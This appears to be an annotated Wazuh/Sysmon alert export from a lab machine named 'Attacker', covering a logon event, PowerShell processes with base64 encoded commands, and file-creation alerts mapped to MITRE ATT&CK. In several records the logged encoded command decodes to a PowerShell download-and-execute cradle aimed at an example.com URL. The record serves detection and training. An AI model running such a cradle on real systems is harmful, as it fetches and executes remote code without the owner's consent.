data.win.system.severityValue:  AUDIT_SUCCESS
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "An account was successfully logged on. Subject: Security ID: S-1-5-18 Account Name: ATTACKER$ Account Domain: WORKGROUP Logon ID: 0x3E7 Logon Information: Logon Type: 5 Restricted Admin Mode: - Remote Credential Guard: - Virtual Account: No Elevated Token: Yes Impersonation Level: Impersonation New Logon: Security ID: S-1-5-18 Account Name: SYSTEM Account Domain: NT AUTHORITY Logon ID: 0x3E7 Linked Logon ID: 0x0 Network Account Name: - Network Account Domain: - Logon GUID: {00000000-0000-0000-0000-000000000000} Process Information: Process ID: 0x304 Process Name: C:\Windows\System32\services.exe Network Information: Workstation Name: - Source Network Address: - Source Port: - Detailed Authentication Information: Logon Process: Advapi Authentication Package: Negotiate Transited Services: - Package Name (NTLM only): - Key Length: 0 This event is generated when a logon session is created. It is generated on the computer that was accessed. The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. The impersonation level field indicates the extent to which a process in the logon session can impersonate. The authentication information fields provide detailed information about this specific logon request. - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. - Transited services indicate which intermediate services have participated in this logon request. - Package name indicates which sub-protocol was used among the NTLM protocols. - Key length indicates the length of the generated session key. This will be 0 if no session key was requested."
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectUserSid:  S-1-5-18
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectUserName:  ATTACKER$
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectDomainName:  WORKGROUP
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectLogonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetUserSid:  S-1-5-18
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetUserName:  SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetDomainName:  NT AUTHORITY
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetLogonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonType:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonProcessName:  Advapi
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.authenticationPackageName:  Negotiate
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {00000000-0000-0000-0000-000000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.keyLength:  0
Key length used during logon (e.g., 128‑bit). Weak keys = downgrade attacks.

data.win.eventdata.processId:  0x304
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processName:  C:\\Windows\\System32\\services.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.impersonationLevel:  %%1833
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.virtualAccount:  %%1843
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetLinkedLogonId:  0x0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.elevatedToken:  %%1842
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Powershell.exe spawned a powershell process which executed a base64 encoded command

🧠 What happened? Powershell.exe spawned a powershell process which executed a base64 encoded command

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:37:17.917+0000 | 🧠 MITRE: ['Execution'] – ['PowerShell'] [T1059.001]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1059 – Command & Scripting Interpreter

🔍 Full Alert Details
timestamp:  2025-04-24T22:37:17.917+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  12
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Powershell.exe spawned a powershell process which executed a base64 encoded command
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92057
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1059.001']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Execution']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['PowerShell']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  48
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534237.1366120
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  1
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  1
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:37:15.3032370Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  283548
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:37:13.983 ProcessGuid: {94294ddc-bd19-680a-380b-000000000e00} ProcessId: 14056 Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe FileVersion: 10.0.26100.3323 (WinBuild.160101.0800) Description: Windows PowerShell Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: PowerShell.EXE CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA CurrentDirectory: C:\Users\Attcker1\ User: Attacker\Attcker1 LogonGuid: {94294ddc-ea85-67fe-8465-020000000000} LogonId: 0x26584 TerminalSessionId: 1 IntegrityLevel: Medium Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC ParentProcessGuid: {94294ddc-bd16-680a-360b-000000000e00} ParentProcessId: 13184 ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA ParentUser: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:37:13.983
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bd19-680a-380b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  14056
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.fileVersion:  10.0.26100.3323 (WinBuild.160101.0800)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.description:  Windows PowerShell
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.product:  Microsoft® Windows® Operating System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.company:  Microsoft Corporation
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.originalFileName:  PowerShell.EXE
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.commandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.currentDirectory:  C:\\Users\\Attcker1\\
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {94294ddc-ea85-67fe-8465-020000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonId:  0x26584
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.terminalSessionId:  1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.integrityLevel:  Medium
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.hashes:  SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessGuid:  {94294ddc-bd16-680a-360b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessId:  13184
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentImage:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentCommandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentUser:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Executable file dropped in folder commonly used by malware

🧠 What happened? Executable file dropped in folder commonly used by malware

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:37:18.079+0000 | 🧠 MITRE: ['Command and Control'] – ['Ingress Tool Transfer'] [T1105]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1105 – Ingress Tool Transfer

🔍 Full Alert Details
timestamp:  2025-04-24T22:37:18.079+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  15
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable file dropped in folder commonly used by malware
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92213
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1105']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Command and Control']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Ingress Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  52
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534238.1374191
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  11
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  11
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:37:15.8420160Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  283558
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-24 22:37:15.808 ProcessGuid: {94294ddc-bd19-680a-380b-000000000e00} ProcessId: 14056 Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_4aau3oor.h1p.ps1 CreationUtcTime: 2025-04-24 22:37:15.807 User: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:37:15.808
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bd19-680a-380b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  14056
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetFilename:  C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_4aau3oor.h1p.ps1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.creationUtcTime:  2025-04-24 22:37:15.807
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Powershell.exe spawned a powershell process which executed a base64 encoded command

🧠 What happened? Powershell.exe spawned a powershell process which executed a base64 encoded command

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:37:19.791+0000 | 🧠 MITRE: ['Execution'] – ['PowerShell'] [T1059.001]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1059 – Command & Scripting Interpreter

🔍 Full Alert Details
timestamp:  2025-04-24T22:37:19.791+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  12
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Powershell.exe spawned a powershell process which executed a base64 encoded command
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92057
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1059.001']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Execution']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['PowerShell']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  49
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534239.1376960
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  1
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  1
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:37:17.2591799Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  283599
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:37:16.698 ProcessGuid: {94294ddc-bd1c-680a-3d0b-000000000e00} ProcessId: 13236 Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe FileVersion: 10.0.26100.3323 (WinBuild.160101.0800) Description: Windows PowerShell Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: PowerShell.EXE CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA CurrentDirectory: C:\Users\Attcker1\ User: Attacker\Attcker1 LogonGuid: {94294ddc-ea85-67fe-8465-020000000000} LogonId: 0x26584 TerminalSessionId: 1 IntegrityLevel: Medium Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC ParentProcessGuid: {94294ddc-bd19-680a-380b-000000000e00} ParentProcessId: 14056 ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA ParentUser: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:37:16.698
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bd1c-680a-3d0b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  13236
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.fileVersion:  10.0.26100.3323 (WinBuild.160101.0800)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.description:  Windows PowerShell
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.product:  Microsoft® Windows® Operating System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.company:  Microsoft Corporation
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.originalFileName:  PowerShell.EXE
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.commandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.currentDirectory:  C:\\Users\\Attcker1\\
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {94294ddc-ea85-67fe-8465-020000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonId:  0x26584
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.terminalSessionId:  1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.integrityLevel:  Medium
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.hashes:  SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessGuid:  {94294ddc-bd19-680a-380b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessId:  14056
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentImage:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentCommandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentUser:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Executable file dropped in folder commonly used by malware

🧠 What happened? Executable file dropped in folder commonly used by malware

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:37:20.136+0000 | 🧠 MITRE: ['Command and Control'] – ['Ingress Tool Transfer'] [T1105]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1105 – Ingress Tool Transfer

🔍 Full Alert Details
timestamp:  2025-04-24T22:37:20.136+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  15
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable file dropped in folder commonly used by malware
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92213
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1105']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Command and Control']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Ingress Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  53
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
